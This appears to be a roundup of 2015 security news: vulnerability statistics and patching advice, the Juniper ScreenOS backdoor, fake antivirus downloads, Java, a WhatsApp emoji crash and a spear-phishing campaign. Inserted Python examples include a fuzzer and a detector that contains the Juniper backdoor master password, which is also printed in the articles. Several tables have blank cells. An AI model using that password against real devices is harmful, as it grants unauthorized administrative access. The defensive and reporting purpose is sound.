You can’t be invulnerable, but you can be well protected
Software vulnerabilities are one of those problems that potentially affect all users. A vulnerability is a flaw in a program’s design or implementation that attackers can use to gain unauthorized access to data, inject malicious code or put a system out of operation. Many vulnerabilities arise from a lack of attention to detail at the design stage rather than from programming errors. Sometimes a system can seem virtually invulnerable when it is designed, but then, at some point, a new technology arises and attackers prove that the system can be successfully attacked. A notable example is DES, a symmetric-key encryption algorithm developed in 1975 whose 56-bit key was considered adequate at the time. In 1998, however, a distributed brute-force effort recovered a DES key in 39 days, and a purpose-built key-search machine completed the same year did it in less than three days.

Continually testing popular software for vulnerabilities and releasing patches for those found is part of a program’s normal lifecycle. The more sophisticated and popular a program is, the more likely it is that vulnerabilities will be found in it.

Searching for vulnerabilities

Most developers try to close any vulnerabilities found in their products in a timely manner. They analyze their software independently or with the help of external experts. However, third-party researchers also hunt for vulnerabilities. Some do this to improve the overall level of security online. Others are paid to search for vulnerabilities. Still others prefer to sell information on any vulnerabilities they discover on the black market.

They can do this because information on new vulnerabilities is valuable to cybercriminals. If a researcher finds a flaw in a system and proves that it can be exploited in practice (that is, writes a working exploit), the information can fetch tens of thousands of dollars on the black market. There is an entire sector of the cybercriminal underworld that specializes in finding and selling vulnerabilities.

Luckily, this business does not operate on a mass scale. One reason is that not all vulnerabilities can be exploited in the real world: a combination of conditions is often needed to do real harm, and such combinations do not arise very often. A second reason is that writing a reliable exploit takes a highly skilled programmer, and there are not many of them around.

One more option for making money from vulnerabilities is to sell them to third-party companies that, at first glance, seem to have nothing to do with crime. This is what some researchers do. However, these companies may be involved in creating spyware for governments or intelligence services, so the vulnerabilities will still be used to illegitimately manipulate information systems. Moreover, the security of such companies is not always as good as it ought to be, so occasionally outside parties gain access to their stockpile of vulnerabilities, with dire consequences.

Idealists who search for vulnerabilities for the sake of general security face a dilemma. The later they publicly announce their discovery, the more time the developer has to fix the problem. The earlier they publish, the sooner users learn about the danger posed by the vulnerability. Cybercriminals might also discover the vulnerability independently and exploit it in the meantime. It should also be kept in mind that disclosure inevitably triggers attempts to abuse the newly published vulnerability; sometimes attacks start within hours of the information becoming public. This is what happened, for example, after the Shellshock disclosure.

What are the dangers of vulnerabilities?

An exploit is a program or code fragment that uses a vulnerability to attack a computing system. In some cases an exploit is used on a mass scale: cybercriminals use it against a broad range of systems, exploiting vulnerabilities in popular software (such as Adobe Flash Player) to deliver payloads to user machines. This is commonly done via so-called drive-by attacks, which attempt to download malicious code to the computers of all users visiting a compromised website.

Sometimes cybercriminals develop targeted attacks. They analyze the software used by a particular company and write targeted exploits for those specific programs. One such highly tailored attack was carried out as part of the Duqu 2.0 APT.

The ‘useful’ life of an exploit varies. Some are used for years even though patches that close the relevant vulnerabilities have long been available, because some users are in no hurry to install them.

According to Kaspersky Lab data, cybercriminals currently make extensive use of exploits for the vulnerabilities listed below:

| Software product | Vulnerability |
| Adobe Flash Player | |
| Microsoft Internet Explorer | |
| Microsoft Office | CVE-2012-0158 |
| Microsoft Windows | CVE-2015-1701 |
The year in a CVE identifier is the year the identifier was assigned, which is usually close to the time the flaw was disclosed. It is easy to see from the identifiers that most of these vulnerabilities date from this year, but some go back to 2014 and even 2012. The fact that they are still being exploited means that many users have not bothered to update the affected software.

Defending against exploits

The main recommendations are really quite simple: update your software regularly and do not use outdated software. The latter piece of advice can be hard to follow: it is sometimes difficult to find a replacement for a familiar and convenient program that is no longer maintained. While developers no longer track vulnerabilities in obsolete software or release patches for them, cybercriminals continue to watch for an opportunity to exploit them. The upshot is that you need additional protection if you continue to use such software.

There are dedicated tools designed to scan computers for known vulnerabilities and, if detected, automatically install updates. These tools include, for example, Kaspersky Systems Management components Vulnerability Assessment and Patch Management. Kaspersky Lab is also developing a similar solution for home users called Kaspersky Software Updater. The utility is currently in beta testing.

Kaspersky Lab uses a vulnerability naming system (KLA identifiers) that differs from the codes used in the CVE (Common Vulnerabilities and Exposures) system. While a CVE identifier always corresponds to one vulnerability, a KLA code can cover a group of vulnerabilities (in most cases, vulnerabilities closed by one patch or present in one version of a program); sometimes dozens of vulnerabilities fall under one code, depending on how the software vendor packaged its patches. As a result, the 20 KLA entries listed below actually correspond to 375 CVE vulnerabilities.

According to Kaspersky Security Network statistics, vulnerability scanning most often identifies the following sets of vulnerabilities on our users’ machines:

| # | KLA | Number of users | Date of discovery | Description |
| 1 | KLA10680 | 308219 | 2015-10-14 | Code execution vulnerability in Adobe Flash Player |
| 2 | KLA10036 | 256383 | 2014-07-08 | Multiple vulnerabilities in Adobe Flash and Adobe AIR |
| 3 | KLA10492 | 228454 | 2013-10-16 | Multiple vulnerabilities in Oracle products |
| 4 | KLA10670 | 182972 | 2015-09-21 | Multiple vulnerabilities in Adobe products |
| 5 | KLA10650 | 176435 | 2015-08-11 | Multiple vulnerabilities in Adobe products |
| 6 | KLA10653 | 150987 | 2015-05-18 | Code execution vulnerability in QuickTime |
| 7 | KLA10682 | 150960 | 2015-10-13 | Multiple vulnerabilities in Adobe Acrobat and Reader |
| 8 | KLA10628 | 138039 | 2015-07-14 | Multiple vulnerabilities in Adobe Acrobat |
| 9 | KLA10651 | 135291 | 2015-08-17 | Code injection vulnerability in VLC Media Player |
| 10 | KLA10655 | 134824 | 2015-09-01 | Multiple vulnerabilities in Google Chrome |
| 11 | KLA10672 | 108722 | 2015-09-22 | Multiple vulnerabilities in Mozilla Firefox |
| 12 | KLA10654 | 107661 | 2015-08-27 | Multiple vulnerabilities in Mozilla Firefox |
| 13 | KLA10691 | 103880 | 2015-11-10 | Multiple vulnerabilities in Google Chrome |
| 14 | KLA10344 | 100311 | 2009-11-05 | Multiple vulnerabilities in Sun Java SE |
| 15 | KLA10669 | 92345 | 2015-09-16 | Multiple vulnerabilities in Apple iTunes |
| 16 | KLA10684 | 91013 | 2015-10-22 | Code execution vulnerability in Flash plugin for Google Chrome |
| 17 | KLA10663 | 87898 | 2015-09-08 | Code execution vulnerability in Adobe Shockwave Player |
| 18 | KLA10690 | 87478 | 2015-11-10 | Multiple vulnerabilities in Adobe products |
| 19 | KLA10569 | 86657 | 2015-04-28 | Vulnerability in OpenOffice |
| 20 | KLA10671 | 84380 | 2015-09-21 | Flash Player update for Google Chrome |
Vulnerability sets KLA10680 and KLA10650 are particularly notable: the former includes, among others, CVE-2015-7645, and the latter CVE-2015-5560. Both CVEs also appear in the first table above, which lists the most commonly exploited software flaws.

Naturally, security products also include technologies designed to block attempts to exploit vulnerabilities. They closely track application behavior (particularly that of applications known to be prone to vulnerabilities) and identify and block suspicious activity.

How is the security industry doing?

Vulnerabilities can be found in security solutions, just like in any other software products. The only difference is that security vendors have a much greater responsibility, because security software is essentially the last line of defense. That is why Internet security companies are especially careful and thorough when it comes to checking products for vulnerabilities.

We cannot speak for the industry as a whole, so we are going to use the only example we are familiar with – that is, our own. We keep the security of our products in mind at all stages of development, from defining the attack surface at the design stage to special testing procedures aimed at identifying possible vulnerabilities in products that are nearly ready to be released. In the process of development, R&D staff not only create the necessary product functionality but also make certain that the new features cannot be used to compromise the program’s integrity.

We believe that this approach is more effective than a dedicated team responsible for tracking vulnerabilities in all of the company’s products. Which is not to say that we do not have such a team. A group of security architects regularly checks newly developed code for vulnerabilities using fuzz testing (so-called fuzzing) and penetration testing.

Fuzzing essentially means feeding a program malformed or random data and checking for unintended behavior: crashes, hangs, unhandled errors or memory corruption. In other words, products are tested on abnormal or distorted data sets, with anything other than a clean, deliberate rejection of bad input counted as a finding.
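The loop below, added here as an illustration rather than code from Kaspersky Lab or the original article, shows the mechanics of a mutation fuzzer on a deliberately small target. The target is a constructed toy record parser, not any real product: `parse_records` trusts its length field and lets decode errors escape, while `parse_records_safe` rejects every malformed input with a plain ValueError. The harness mutates a valid seed and treats any exception other than the parser's documented rejection type as a bug, which is exactly the signal fuzzing is meant to produce.

```python
"""Minimal mutation fuzzer against a constructed toy record parser.

Record format (constructed for this example): [type:1][length:1][payload:length].
Type 1 is a UTF-8 string, type 2 is a big-endian int32 (payload must be 4 bytes).
"""
import random
import struct
from typing import Callable, Dict, List, Tuple

T_STRING, T_INT32 = 1, 2


def parse_records(data: bytes) -> List[Tuple[int, object]]:
    """Sloppy parser: trusts the length field, lets library errors leak out."""
    out, i = [], 0
    while i < len(data):
        rtype, length = data[i], data[i + 1]              # IndexError on a trailing byte
        payload = data[i + 2:i + 2 + length]              # silently short if truncated
        if rtype == T_STRING:
            out.append((rtype, payload.decode("utf-8")))  # UnicodeDecodeError escapes
        elif rtype == T_INT32:
            out.append((rtype, struct.unpack(">i", payload)[0]))  # struct.error if len != 4
        else:
            raise ValueError(f"unknown record type {rtype}")
        i += 2 + length
    return out


def parse_records_safe(data: bytes) -> List[Tuple[int, object]]:
    """Hardened parser: every malformed input is rejected with a plain ValueError."""
    out, i = [], 0
    while i < len(data):
        if len(data) - i < 2:
            raise ValueError("truncated record header")
        rtype, length = data[i], data[i + 1]
        payload = data[i + 2:i + 2 + length]
        if len(payload) != length:
            raise ValueError("truncated payload")
        if rtype == T_STRING:
            try:
                out.append((rtype, payload.decode("utf-8")))
            except UnicodeDecodeError as exc:             # wrap, don't leak a subclass
                raise ValueError("invalid UTF-8 in string record") from exc
        elif rtype == T_INT32:
            if length != 4:
                raise ValueError("int32 record must be 4 bytes")
            out.append((rtype, struct.unpack(">i", payload)[0]))
        else:
            raise ValueError(f"unknown record type {rtype}")
        i += 2 + length
    return out


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation: bit flip, byte overwrite, insert, delete or truncate."""
    buf = bytearray(data)
    op = rng.randrange(5)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif op == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 2:
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    elif op == 3 and buf:
        del buf[rng.randrange(len(buf))]
    elif buf:
        del buf[rng.randrange(len(buf)):]
    return bytes(buf)


def fuzz(parser: Callable[[bytes], object], seed: bytes, iterations: int = 2000,
         rng_seed: int = 1, expected: Tuple[type, ...] = (ValueError,)) -> Dict[str, bytes]:
    """Mutate `seed` repeatedly; keep one crashing input per distinct exception type.

    Only an exception whose exact type is in `expected` counts as a documented
    rejection. Subclasses (e.g. UnicodeDecodeError under ValueError) are findings:
    they are errors the parser did not anticipate.
    """
    rng = random.Random(rng_seed)                         # deterministic run
    findings: Dict[str, bytes] = {}
    for _ in range(iterations):
        candidate = seed
        for _step in range(rng.randint(1, 4)):            # stack a few mutations
            candidate = mutate(candidate, rng)
        try:
            parser(candidate)
        except Exception as exc:
            if type(exc) in expected:
                continue
            findings.setdefault(type(exc).__name__, candidate)
    return findings


# Constructed valid seed: one string record and one int32 record.
SEED = bytes([T_STRING, 5]) + b"hello" + bytes([T_INT32, 4]) + struct.pack(">i", 42)

if __name__ == "__main__":
    for name, parser in (("sloppy", parse_records), ("hardened", parse_records_safe)):
        found = fuzz(parser, SEED)
        print(f"{name}: {sorted(found) or 'no findings'}")
        for exc_name, crash in found.items():
            print(f"  {exc_name}: {crash.hex()}")
```

Two details carry over to real fuzzing campaigns: seed the random generator so a finding can be reproduced, and define the parser's failure contract precisely (here, exactly ValueError) so that the harness does not mistake an escaped library exception for a clean rejection.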

Penetration testing is carried out both internally and by external experts. It should be noted, however, that in our experience few external experts know enough about how security products work to search for vulnerabilities in them effectively. Additionally, Kaspersky Lab has a team that specializes in searching third-party code for vulnerabilities (its services are used, among others, by banks seeking to verify the security of their applications). Even though third-party applications are the team’s top priority, these experts also analyze code developed in-house.

We also value the work of independent researchers. Anyone who has found a vulnerability in our technologies can report it through a dedicated reporting channel. Kaspersky Lab experts thoroughly analyze all data that arrives through it. The procedure is as follows: first, our analysts confirm that there really is a vulnerability. Once confirmed, we contact the researcher and agree on a date when the information will be made public. Meanwhile, the details are passed to the R&D team responsible for the affected technology, and we check whether the vulnerability is present in any other Kaspersky Lab products. Independent researchers do sometimes draw our attention to serious issues, and we really appreciate it.

A few practical recommendations

Since only software developers can fix vulnerabilities, users can only reduce their exposure. Here are some recommendations:

As we have said many times before, update your software. If the developer provides an update for its product, the chances are that it does so for a good reason.
Do not disable automatic updates. True, this can be a bit of a nuisance if you have lots of programs, but security is what really counts.
Remove the programs you no longer use. There is no reason for this dead weight to remain on your hard drive. One day such programs could do you a grave disservice.
Do not use obsolete software. If it is really such a handy, useful program, there must be other similar programs available. True, it can be hard to abandon a familiar interface, but it is better to spend a few days getting used to a new one than using vulnerable software.
Regularly scan your computer for known vulnerabilities using dedicated utilities.

Hackers in the wild attempt to exploit the Juniper Backdoor

A honeypot set up by researchers at the SANS Institute has shown that hackers are already attempting to exploit the Juniper backdoor.
Shortly after Juniper posted the advisory about the presence of unauthorized code in the operating system of some of its firewalls, HD Moore, the developer of Rapid7’s Metasploit Framework, revealed that approximately 26,000 NetScreen devices are connected to the Internet with SSH open.

“Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.” he wrote in a blog post.

Ronald Prins, founder and CTO of the security firm Fox-IT, explained that by reverse engineering the patch released by Juniper his experts were able to recover the backdoor master password ("<<< %s(un='%s') = %u"), a string deliberately shaped to look like a debug format string so that it would not stand out in the binary.

“Once you know there is a backdoor there, … the patch [Juniper released] gives away where to look for [the backdoor] … which you can use to log into every [Juniper] device using the Screen OS software,” he told WIRED. “We are now capable of logging into all vulnerable firewalls in the same way as the actors [who installed the backdoor].” explained Prins.

Fox-IT has also released Snort rules that sysadmins can use to detect unauthorized access to Juniper devices through the backdoor.

The news of the day is that a honeypot set up by researchers at the SANS Technology Institute’s Internet Storm Center (ISC) has recorded attacks attempting to exploit the recently disclosed vulnerability in Juniper firewalls. Recall that exploiting the flaw gives an attacker administrative access to the network device.

“Since our initial announcement we’ve learned that the number of versions of ScreenOS affected by each of the issues is more limited than originally believed. Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20,” Juniper reported, inviting administrators to apply the security updates as soon as possible.

The two vulnerabilities can be respectively exploited to remotely gain administrative access to a device via telnet or SSH (CVE-2015-7755) and to decrypt VPN traffic (CVE-2015-7756).

Researchers at the SANS Technology Institute deployed a honeypot that emulates Juniper devices running ScreenOS in order to attract threat actors in the wild. They revealed that attackers have been using the recently disclosed backdoor password in attempts to access the honeypot via SSH.

“Our honeypot doesn’t emulate ScreenOS beyond the login banner, so we do not know what the attackers are up to, but some of the attacks appear to be ‘manual’ in that we do see the attacker trying different commands,” said Johannes Ullrich from the SANS Technology Institute.

Juniper attacks honeypot SANS

The experts observed dozens of exploit attempts, most of them using the usernames “root” and “admin.” Below is the complete list of usernames tried by the attackers:

| username | count(*) |
| root | 29 |
| admin | 18 |
| netscreen | 8 |
| login | 8 |
| administrator | 5 |
| test | 4 |
| system | 2 |
| bob | 1 |
| sdes | 1 |
| sqzeds | 1 |
| sqzds | 1 |
The researchers also collected the source IP addresses used by the attackers; one IP alone accounted for 24 of the attempts.

Altogether 78 attempts were observed in about five hours. One of the IPs belongs to the security firm Qualys, so the attempts from that source are presumably research activity.

| ip | count(*) |
| | 24 |
| | 8 |
| | 7 |
| | 7 |
| | 5 |
| | 4 |<- Qualys (probably "research")
| | 4 |
| | 4 |
| | 4 |
| | 3 |
| | 2 |
| | 2 |
| | 1 |
| | 1 |
| | 1 |
| | 1 |
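The two pieces of work described above, Fox-IT's network signatures for the backdoor and the SANS ISC tally of usernames and source IPs, come down to a string match and a couple of counters. The following is an added example written for this page, not Fox-IT's Snort rules or the ISC honeypot code. It assumes a reassembled client-to-server telnet stream as bytes and a constructed, tab-separated honeypot log of the shape `timestamp, source IP, username, password` (documentation-range IPs, invented timestamps). One caveat a network sensor has to live with: the password string is only visible in cleartext telnet; inside an SSH session it is encrypted, so SSH abuse of the backdoor has to be spotted from the device's own authentication logs or from connection metadata, which is why a honeypot that logs the attempted credentials is so useful.

```python
"""Spotting use of the ScreenOS authentication backdoor (CVE-2015-7755).

1. telnet_uses_backdoor(): find the backdoor password in a cleartext telnet
   stream after stripping option negotiation (IAC sequences) that could
   otherwise split the string.
2. summarize(): aggregate honeypot login attempts by username and source IP,
   and count attempts that used the backdoor string.
"""
from collections import Counter
from typing import Dict, Iterable, List, NamedTuple

# Master password recovered from the ScreenOS binary (from the reporting above).
BACKDOOR_PASSWORD = b"<<< %s(un='%s') = %u"

IAC, SB, SE = 255, 250, 240          # telnet command bytes (RFC 854)


def strip_telnet_iac(stream: bytes) -> bytes:
    """Remove telnet option negotiation so only user-typed bytes remain."""
    out, i, n = bytearray(), 0, len(stream)
    while i < n:
        b = stream[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 < n and stream[i + 1] == IAC:          # IAC IAC = literal 0xFF
            out.append(IAC)
            i += 2
        elif i + 1 < n and stream[i + 1] == SB:           # IAC SB ... IAC SE
            end = stream.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        elif i + 1 < n and 251 <= stream[i + 1] <= 254:   # IAC WILL/WONT/DO/DONT <opt>
            i += 3
        else:                                             # any other two-byte command
            i += 2
    return bytes(out)


def telnet_uses_backdoor(stream: bytes) -> bool:
    """True if the (reassembled) client->server telnet stream carries the backdoor password."""
    return BACKDOOR_PASSWORD in strip_telnet_iac(stream)


class Attempt(NamedTuple):
    ts: str
    src_ip: str
    username: str
    password: str


def parse_honeypot_log(lines: Iterable[str]) -> List[Attempt]:
    """Parse tab-separated records: ts, src_ip, username, password (constructed format)."""
    attempts = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        ts, src_ip, username, password = line.split("\t", 3)
        attempts.append(Attempt(ts, src_ip, username, password))
    return attempts


def summarize(attempts: List[Attempt]) -> Dict[str, object]:
    """Counts by username and source IP, plus how many attempts used the backdoor string."""
    backdoor = [a for a in attempts if a.password.encode() == BACKDOOR_PASSWORD]
    return {
        "by_username": Counter(a.username for a in attempts),
        "by_ip": Counter(a.src_ip for a in attempts),
        "backdoor_attempts": len(backdoor),
        "backdoor_ips": sorted({a.src_ip for a in backdoor}),
    }


# Constructed sample log (documentation-range IPs), shaped like the ISC tables above.
SAMPLE_LOG = """\
# ts\tsrc_ip\tusername\tpassword
2015-12-21T10:01:02Z\t203.0.113.5\troot\t<<< %s(un='%s') = %u
2015-12-21T10:01:09Z\t203.0.113.5\tadmin\t<<< %s(un='%s') = %u
2015-12-21T10:02:44Z\t198.51.100.7\tnetscreen\t<<< %s(un='%s') = %u
2015-12-21T10:03:10Z\t198.51.100.7\troot\tpassword123
2015-12-21T10:05:31Z\t192.0.2.9\tadmin\tadmin
2015-12-21T10:06:02Z\t203.0.113.5\troot\t<<< %s(un='%s') = %u
"""

if __name__ == "__main__":
    # Constructed telnet stream: IAC DO ECHO, a username, then the password
    # interrupted by an IAC WILL TERMINAL-TYPE negotiation.
    stream = (bytes([IAC, 253, 1]) + b"netscreen\r\n" + BACKDOOR_PASSWORD[:5]
              + bytes([IAC, 251, 24]) + BACKDOOR_PASSWORD[5:] + b"\r\n")
    print("backdoor password in telnet stream:", telnet_uses_backdoor(stream))
    summary = summarize(parse_honeypot_log(SAMPLE_LOG.splitlines()))
    for key, value in summary.items():
        print(f"{key}: {value}")
```

The IAC stripping matters because a signature that matches the raw byte string misses a session where the client negotiates an option mid-line; a Snort rule needs the same normalization, which is what the telnet preprocessor provides. On the aggregation side, counting by password as well as by username is what separates a scan for weak credentials from someone actually holding the backdoor string.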
After the disclosure of the unauthorized code in Juniper’s network appliances, the networking giant Cisco decided to review its own products for the presence of malicious code.

“Although our normal practices should detect unauthorized software, we recognize that no process can eliminate all risk,” Cisco’s Anthony Grieco said. “Our additional review includes penetration testing and code reviews by engineers with deep networking and cryptography experience.”

Beware of fake antivirus and antimalware products. Watch where you download from

23.12.2015 Viruses

You have to be careful not only that you do not acquire an antimalware/antivirus product that is not what it claims to be, but also that you are downloading the genuine one from the genuine source.
Malwarebytes are the makers of an antimalware program that scans your computer for things antivirus companies do not consider threats. They are not the only ones, but they definitely belong among the few worth having in your toolkit for an occasional check of your computer, or for the moment when your computer starts behaving strangely.

In PUPs Masquerade as Installer for Antivirus and Anti-Adware they warn that they have come across a fake version of their own program. In practice they show fake programs found on antivirus-dld[dot]com, which is actually nothing new. It is common for an inexperienced user to come across such things in search results, or to be lured into downloading something like this through a fake warning during the installation of another program.

At the address above, alongside a fake AdwCleaner you will also find a fake antivirus from AVG. Or, more precisely, you do eventually get the real AVG there, but along with it you also download some malware, adware or crapware onto your computer. As Malwarebytes themselves point out, the piquant part is that AVG downloaded this way, when it runs a scan of the computer, actually detects the fraudulent installer it came from.

The fake AdwCleaner offer does not even bother to download the original program; it just does its dirty work and then redirects the user to a website where the real AdwCleaner can be downloaded.

What is far more significant about this seemingly small operation is that the website mentioned above shares a number of elements with dozens of other websites serving the same purpose. It is a thoroughly engineered system for catching inexperienced unfortunates, and a system that works very similarly on websites where you can download software “for free”, though only rarely without something bundled in that you did not want.

To avoid this kind of danger, you have to search very carefully for the original and not settle for copies, which today commonly come supplemented with something you do not want (and which is not for nothing called a PUP, a potentially unwanted program).

Oracle Ordered to Publicly Admit Misleading Java Security Updates
Security issues have long plagued the more than 850 million users who have Oracle’s Java software installed on their computers. Worse, for years the software was not fully updated or secured, exposing millions of PCs to attack.
And for this reason, Oracle is now paying the price.
Oracle has been accused by the US government of misleading consumers about the security of its Java software.
Oracle is settling with the Federal Trade Commission (FTC) over charges that it "deceived" its customers by failing to warn them about the security upgrades.
Java is software that comes pre-installed on many computers and helps them run web applications, including online calculators, chatrooms, games, and even 3D image viewing.
Oracle Left Over 850 Million PCs at Risk
The FTC has issued a press release saying it has won concessions in a settlement with Oracle over the company’s failure to uninstall older, insecure versions of Java SE from customers’ PCs during the upgrade process, which left up to 850 million PCs susceptible to hacking attacks.
In effect, the updater replaced only the most recent version of the software and ignored the older versions still installed alongside it, versions that were often riddled with security holes an attacker could exploit to compromise a targeted PC.
Oracle is Now Paying the Price
So, under the terms of the settlement with Oracle, announced by the FTC on Monday, Oracle is required to:
Notify Java customers about the issue via Twitter, Facebook, and its official website
Provide tools and instructions on how to remove older versions of Java software
Oracle has agreed to the settlement that is now subject to public comment for 30 days, although Oracle declined to comment on its part.
Meanwhile, the FTC wants Java users to check whether they have older versions of the software installed. Here is the website that will help you remove them:

How to Crash Your Friends' WhatsApp Just By Sending Crazy Smileys
What does it take to crash the wildly popular WhatsApp messaging application?
Nearly 4000 smileys.
Yes, you can crash your friends’ WhatsApp, both WhatsApp Web and the mobile application, by sending them not a specially crafted message, but just smileys.
Indrajeet Bhuyan, an independent researcher, has reported to The Hacker News a new bug in WhatsApp that could allow anyone to remotely crash the messaging app just by sending nearly 4000 emojis to the target user, potentially affecting up to 1 billion users.
Bhuyan is the same researcher who last year reported a widely covered WhatsApp crash bug that required a 2000-word (2 KB) message in a special character set to remotely crash the WhatsApp messenger app.
After that discovery, the company patched the bug by limiting the number of characters in a WhatsApp text message, but unfortunately it failed to set a limit for smileys sent via WhatsApp.
"In WhatsApp Web, WhatsApp allows 65500-6600 characters, but after typing about 4200-4400 smileys the browser starts to slow down," Bhuyan wrote in his blog post. "But since the limit is not yet reached, WhatsApp allows you to go on inserting... when it receives it, it overflows the buffer and crashes."
The bug was tested on Android devices from multiple brands and successfully crashed:
WhatsApp for Android, including Marshmallow, Lollipop and KitKat
WhatsApp Web in the Chrome, Opera and Firefox web browsers.
The latest version of WhatsApp is confirmed to be affected by this bug.
Video Demonstration

You can also watch the Proof-of-Concept (PoC) video that shows the attack in work.

How to Protect Yourself
Bhuyan told The Hacker News that he has reported the WhatsApp crash bug to Facebook. Until the company patches the issue, there is a simple workaround.
If you receive such a message on WhatsApp, open the messenger and delete the whole conversation with the sender.
Remember, though, that if you have kept records of your chat with that particular friend, you will lose them all.
At the beginning of this year, Bhuyan also reported two separate bugs — WhatsApp Photo Privacy bug and WhatsApp Web Photo Sync Bug — in the WhatsApp web client that in some way exposes its users’ privacy.

Encrypted Email Servers Seized by German Authorities After School Bomb Threats
In the wake of a hoax bomb threat that closed all public schools in Los Angeles for a day last week, German authorities have seized an encrypted email server.
But does that make sense?
In a video statement posted on Monday, the administrator of – an anonymous email provider – said German authorities had seized a hard drive from one of its servers, which was hosted in a Bavarian data center.
The email provider was thought to have been used last week to send bomb threatening emails to several school districts across the United States, resulting in the closure of all schools in the Los Angeles Unified School District.
Even though the New York City Department of Education dismissed the e-mail as an obvious hoax, German authorities seized a hard drive that, according to the service’s administrator, holds "all data" on the company.
According to the administrator, Vincent Canfield, "SSL keys and private keys and full mail content of all 64,500 of my users...hashed passwords, registration time, and the last seven days of logs were all confiscated and now are in the hands of German authorities."
 is Still Functional, but All Sensitive Data is in the Hands of the Authorities
However, the service is still operational because it was hosted on a server using a pair of drives in a RAID1 configuration, in which data is written to both drives simultaneously so that nothing is lost if one of them fails. The same mirroring means the seized drive holds a complete copy of everything on the one that remains.
German authorities took one of the hard drives; the other, mirrored drive is still in use.
But the significant risk still remains – the German authorities have had their hands on a lot of sensitive data of the users including:
SSL keys and Private keys
Full mail content of all users
Hashed passwords
Registration time
The last seven days of logs
The service was launched in late 2013 and has since garnered more than 28,000 registered accounts under its domain.
Canfield has retained Jesselyn Radack, a well-known attorney who is representing former National Security Agency (NSA) contractor Edward Snowden as well as former NSA whistleblower Thomas Drake.

Who planted the Juniper ScreenOS Authentication Backdoor?


Who planted the Authentication Backdoor in the Juniper ScreenOS? Security experts are making their speculation, but interesting revelations are coming out.
While the FBI investigates the case, searching for those responsible for the introduction of a backdoor into a number of Juniper network devices, speculation is circulating on the Internet. Juniper Networks is a technology provider for the US Government and many US federal agencies, including the FBI, which means the attackers may have had access to traffic carried over connections protected by VPNs.

Some blame China, others the NSA, and the majority point to a more generic nation-state actor.

The experts who blame the Chinese Government argue that the compromised appliance was originally developed by NetScreen Technologies, a company acquired by Juniper Networks in 2004. NetScreen Technologies was founded by Chinese nationals, which is why some experts believe Chinese engineers have deep knowledge of the compromised ScreenOS.

“It’s not hard to find evidence of ongoing work on ScreenOS in Beijing: a quick trawl of LinkedIn turns up several Juniper employees who work on the operating system. The Register in no way suggests that those who work in Juniper’s Beijing offices are in any way associated with the unauthorised code. We nonetheless asked Juniper if the code is known to have come from the Beijing facility.” states a blog post published by The Register.

Many experts suspect NSA involvement: one of the documents leaked by Edward Snowden and published by the German magazine Der Spiegel revealed that the US intelligence agency had the ability to plant backdoors in various network equipment, including Juniper firewalls.

NSA Juniper implant

There is also speculation that the two backdoors might not be the work of the same state-actor, as they are not connected.

According to the German magazine, the implants were built by hackers in the ANT division (Advanced or Access Network Technology), operating under the NSA’s department for Tailored Access Operations (TAO):

“In the case of Juniper, the name of this particular digital lock pick is “FEEDTROUGH.” This malware burrows into Juniper firewalls and makes it possible to smuggle other NSA programs into mainframe computers. Thanks to FEEDTROUGH, these implants can, by design, even survive “across reboots and software upgrades.” In this way, US government spies can secure themselves a permanent presence in computer networks. The catalog states that FEEDTROUGH “has been deployed on many target platforms,” Der Spiegel wrote.

HD Moore, the developer of Rapid7’s Metasploit Framework, confirmed that roughly 26,000 NetScreen devices are exposed on the Internet with SSH open.

“Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.” he wrote in a blog post.

HD Moore added that the authentication backdoor appears to date from late 2013, and the VPN (encryption) backdoor from 2012.

“This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).”

Ronald Prins, founder and CTO of Fox-IT, a Dutch security firm, explained that by reverse engineering the patch released by Juniper he was able to recover the backdoor master password ("<<< %s(un='%s') = %u").

“Once you know there is a backdoor there, … the patch [Juniper released] gives away where to look for [the backdoor] … which you can use to log into every [Juniper] device using the Screen OS software,” he told WIRED. “We are now capable of logging into all vulnerable firewalls in the same way as the actors [who installed the backdoor].” explained Prins.

Fox-IT has also released the Snort rules that can be used by the sys admins to detect unauthorized access to the Juniper devices through the backdoor.

“Since our initial announcement we’ve learned that the number of versions of ScreenOS affected by each of the issues is more limited than originally believed. Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20,” Juniper reported, inviting administrators to apply the security updates as soon as possible.

The only certainty is that someone deliberately inserted a backdoor password into Juniper network devices.

Chinese hackers target Taiwanese Opposition Party and media

Security experts at FireEye have uncovered a spear-phishing campaign run by Chinese hackers that is targeting Taiwan’s opposition and media ahead of the vote in January.
According to FireEye, a group of Chinese hackers is targeting Taiwan’s opposition party as well as journalists, security experts and officials. The attacks are occurring weeks before a Taiwanese presidential election.

The hackers are trying to compromise Taiwanese news organizations for intelligence purposes and to obtain election-related information.

“Between November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.” states the report published by FireEye.
